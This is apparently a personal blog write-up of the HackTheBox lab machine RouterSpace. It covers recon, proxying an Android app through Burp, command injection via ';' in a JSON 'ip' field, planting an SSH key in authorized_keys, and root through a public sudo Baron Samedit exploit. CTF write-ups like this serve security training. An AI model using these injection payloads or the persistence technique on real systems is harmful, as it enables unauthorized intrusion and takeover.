Posts HackTheBox - RouterSpace

HackTheBox - RouterSpace


Initial configuration for this machine was very annoying, but once i got anbox working correctly it was rather straight forward. —


└─# nmap -Pn -sV -sC
Starting Nmap 7.92 ( ) at 2022-03-07 16:19 GMT
Nmap scan report for routerspace.htb (
Host is up (0.17s latency).
Not shown: 998 filtered tcp ports (no-response)
22/tcp open  ssh     (protocol 2.0)
| ssh-hostkey: 
|   3072 f4:e4:c8:0a:a6:af:66:93:af:69:5a:a9:bc:75:f9:0c (RSA)
|   256 7f:05:cd:8c:42:7b:a9:4a:b2:e6:35:2c:c4:59:78:02 (ECDSA)
|_  256 2f:d7:a8:8b:be:2d:10:b0:c9:b4:29:52:a8:94:24:78 (ED25519)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-RouterSpace Packet Filtering V1
80/tcp open  http
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-46773
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 70
|     ETag: W/"46-mfBDzdyJQiAB5GVUFd3LcNfMcC0"
|     Date: Mon, 07 Mar 2022 16:20:22 GMT
|     Connection: close
|     Suspicious activity detected !!! {RequestID: qD Vc jdX7z c 6d1 }
|   GetRequest: 
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-36383
|     Accept-Ranges: bytes
|     Cache-Control: public, max-age=0
|     Last-Modified: Mon, 22 Nov 2021 11:33:57 GMT
|     ETag: W/"652c-17d476c9285"
|     Content-Type: text/html; charset=UTF-8
|     Content-Length: 25900
|     Date: Mon, 07 Mar 2022 16:20:21 GMT
|     Connection: close
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-19862
|     Allow: GET,HEAD,POST
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 13
|     ETag: W/"d-bMedpZYGrVt1nR4x+qdNZ2GqyRo"
|     Date: Mon, 07 Mar 2022 16:20:21 GMT
|     Connection: close
|   RTSPRequest, X11Probe: 
|     HTTP/1.1 400 Bad Request
|_    Connection: close
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-title: RouterSpace

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 80.07 seconds

From nmap, we can see SSH on Port 22, and a HTTP server on port 80. Browsing to the website, we are met with the following landing page:


The site displays information on an application called RouterSpace, that can connect routers to routerspace. The site allows us to download routerspace.apk, an android application.

Installing the APK

Originally, i tried to do this using genymotion, however i was unsuccessful in capturing any requests from the application in burp. Due to this, i changed to anbox, and had much more success.

Installing Anbox

I used the following guide to install anbox on my Kali VM:

I also downloaded the recommended anbox android image from:

Once anbox was installed, i installed the routerspace.apk package into anbox using:

adb install routerspace.apk

I then launched anbox, ran routerspace and was presented with an application screen with a “Check Status” button:


So i decided to try and capture the request with burp.


After launching burp, i went to Proxy Options > Proxy Listeners. I added a listener on port 8000, using my tun0 IP address


Now i needed to add the burp proxy to anbox, and i did this using

adb shell settings put global http_proxy

Now when clicking “Check Status”, burp caught the POST request and returned the following:


I then sent this request to repeater, and played around with the request. By editing the JSON ip field, and inputting a ;, i was able to input a command and the remote target would execute it. For this POST request, i used "IP":";whoami", and in the responce received "\npaul\n". burp3

Knowing that the user is Paul, lets have a look inside his directory:


We can see a user.txt, but when trying to cat it, the resulting hash is the incorrect flag.

Exploiting RouterSpace

From here, i tried executing different commands to attempt to launch a reverse shell, but i was unable too. This got me thinking about a potential SSH foothold, due to port 22 being open. Lets see if Paul has a .ssh directory "ip":";ls -la /home/paul/.ssh"


There is a .ssh directory, but there is no public id_rsa key within it, which means i can potentially add my own, and then SSH into the target host.

SSH Key Generation

To generate the keys needed, i ran ssh-keygen within the .ssh directory.

└─# ssh-keygen                                                                             
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in id_rsa
Your public key has been saved in
The key fingerprint is:
SHA256:yEFblsfeIJdPKDEX6Xo1saLB0SZuwo60ARI3wetYseU root@NTAKali
The key's randomart image is:
+---[RSA 3072]----+
|.o+.  . ==o=     |
|..+... +*o@ o    |
| . B .oo @ = o   |
|  + E.oo= + *    |
| + . =ooS+ o .   |
|. . o . o .      |
|         .       |
|                 |
|                 |

And now below we can see our key.

└─# ls                                                                                     

└─# cat
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCkJAfyFYWN+xxa7v9qNUnVn4ZXLS7HMrfLQ3z8ioTH19CSa/CeSLo2oFQcXQ4CJ3UFvETOVHKl03CLF5aIGBMZxjVHdTr66ZtrKSMVuwP7D/JuyV+m9n/kL/wKS/o+c7AgwjNCLH0MDdbPA83UwSSIGDw4jtxEMf0hIzQ+Vqn9bg8F8DX49yXEVml1biEdEOAgEEJw/Wi6nvkRzcZOxijqNfyDjCWdJP0+AlVwfpp73M/9txs1B2SminwOd7YA+Wpc27cV6/O4vSQr/FgiIi3p9h2NYbnGwyRIvOiUM+gz1nQb5VXs2PKvY8t3wRvPpquzZXis/QgLo3d8TyvDQ/xkStezvdN1YRqLQTnwXJI/mQSfHuF2jwE6mksyEqJjv9aSzKlwblqCCTO3Jl3EtO4/cZz4aaYmhYuJ60RmsHm6wuPzRzG+Fe5NPWKEZVS+HrV+xHlc0gvZ9qLx57cLIPV0jwXkys+Q22jashzB3LfwrDMGp/bMaCCj25nUzS3KP8E= root@NTAKali

Adding key to target host

Using burp, i can echo the key into the .ssh directory, in a file called authoried_keys using:

{"ip":";echo '<Generated Key>' >> /home/paul/.ssh/authorized_keys"}


As we can see from the image below, the file was created. However, as a Brit, i spelt the directory wrong and used an s instead of a z - Oops.


From here, i re-uploaded the key to the correct directory, and attempted to connect via SSH.

└─# ssh paul@                                                             
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-90-generic x86_64)

 * Documentation:
 * Management:
 * Support:

  System information as of Tue 08 Mar 2022 12:22:28 AM UTC

  System load:           0.0
  Usage of /:            70.5% of 3.49GB
  Memory usage:          17%
  Swap usage:            0%
  Processes:             214
  Users logged in:       0
  IPv4 address for eth0:
  IPv6 address for eth0: dead:beef::250:56ff:feb9:f84a

80 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sat Nov 20 18:30:35 2021 from
paul@routerspace:~$ whoami


Once SSH’d in, it’s as simple as reading the user.txt file.

paul@routerspace:~$ cat user.txt

Priveledge Esculation

Once i had gained a foothold, i attempted to download on the target host. However after setting up the python server, the target host was unable to connect to it to download the file.

paul@routerspace:~$ wget
--2022-03-08 00:34:13--
Connecting to ^C

Instead, i can use Secure Copy scp to upload the file from my local host to the target host over port 22.

scp -P 22 ../Desktop/ paul@


Initially, i attempted to use PwnKit on the machine, as linpeas recommended it.

╔══════════╣ Executing Linux Exploit Suggester
[+] [CVE-2021-4034] PwnKit                                                                        

   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL:

[+] [CVE-2021-3156] sudo Baron Samedit

   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL:

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL:

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Exposure: probable
   Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*}
   Download URL:
   Comments: ip_tables kernel module must be loaded

After looking through linpeas again, i noticed that the host is running a vulnerable version of sudo 1.8.31, but for some reason linpeas didn’t report the CVE issue. sudo One way to test whether sudo is vulnerable to CVE-2021-3156 or not is to run sudoedit -s /, if sudo asks for the users password, it is likely vulnerable.

After googling exploits related to the CVE, i decided to use the following exploit:

After downloading the file to my host machine and unzipping it, i transffered the files over via scp like before. After, i ran make which created an exploit executable. Running this executable elevated me to root!

paul@routerspace:~/test$ make
mkdir libnss_x
cc -O3 -shared -nostdlib -o libnss_x/ shellcode.c
cc -O3 -o exploit exploit.c
paul@routerspace:~/test$ ls
exploit  exploit.c  libnss_x  Makefile  shellcode.c
paul@routerspace:~/test$ ./exploit
# id
uid=0(root) gid=0(root) groups=0(root),1001(paul)


Moving to the root directory, we find the root text file.

# ls
# cat root.txt  
This post is licensed under CC BY 4.0 by the author.